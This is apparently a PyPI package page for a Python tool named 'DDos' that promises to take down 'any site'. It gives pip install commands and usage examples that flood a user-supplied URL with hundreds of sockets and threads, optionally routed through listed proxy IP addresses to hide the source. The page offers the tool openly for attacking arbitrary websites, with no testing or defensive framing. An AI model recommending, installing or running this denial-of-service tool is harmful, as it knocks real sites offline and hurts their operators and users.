DDos any site
Project description
DDos
DDos any site using python
Install
From Pypi
pip3 install DDos==1.0.1
(You should really use this version)
From GitHub
pip3 install git+https://github.com/donno2048/DDos
Usage
GUI
To use it just run:
DDos
or
ddos
in the terminal to launch the GUI (tkinter is a requirement for the GUI so use: sudo apt-get update && sudo apt-get install python3-tk -y
on linux and on Windows it's already installed)
TUI
To use the text-based user interface see this python example:
from DDos import checkUrl, DDos # import the needed functions
while True:
url = input("Give me a URL: ") # get a url from the user
if checkUrl(url): break # if it's formatted correctly exit the loop
else: print("This URL isn't formatted correctly, try again") # else, go back
DDos(url, sockets = 400, threads = 10, use_proxies = True) # ddos this url with 400 sockets and 10 threads and use the built-it proxies
or simply:
from DDos import DDos
DDos(input("Give me a URL: ")) # if the url isn't formatted correctly it will have an assertion error, use 500 sockets and 10 threads, no proxies will be used
The DDos function has also a custom_proxies
optional variable and there is a checkProxy
function, you can use them like so:
from DDos import DDos, checkProxy
assert checkProxy("109.237.91.155:8080")
assert checkProxy("178.128.37.176:80")
DDos(input("Give me a URL: "), use_proxies = True, custom_proxies = ["109.237.91.155:8080", "178.128.37.176:80"])
If you give an invalid proxy you will get an assertion error.
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
File details
Details for the file DDos-1.0.3.tar.gz
.
File metadata
- Download URL: DDos-1.0.3.tar.gz
- Upload date:
- Size: 6.6 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.7.1 importlib_metadata/4.10.0 pkginfo/1.8.2 requests/2.26.0 requests-toolbelt/0.9.1 tqdm/4.62.3 CPython/3.10.1
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 5de17547f66f5b7e658af17e81f61e98251e55748ce829911df58744664473eb |
|
MD5 | 90f6de232fb7967cadea23ef6f069769 |
|
BLAKE2b-256 | 4d14ee513d14b69bc649a59353bf2bf3940628d749920f4f22cd6757135d1548 |
File details
Details for the file DDos-1.0.3-py3-none-any.whl
.
File metadata
- Download URL: DDos-1.0.3-py3-none-any.whl
- Upload date:
- Size: 7.1 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/3.7.1 importlib_metadata/4.10.0 pkginfo/1.8.2 requests/2.26.0 requests-toolbelt/0.9.1 tqdm/4.62.3 CPython/3.10.1
File hashes
Algorithm | Hash digest | |
---|---|---|
SHA256 | 4c6f330b08df12a256723466cb1d188ea5b231dd5174afe83fab45aa3c10d2f7 |
|
MD5 | 904c86ca35561d882d27a902cfb76339 |
|
BLAKE2b-256 | e28cb579326d78e2fe01f87789ba82e174fadfb1ac16377743d7afaa31d21dec |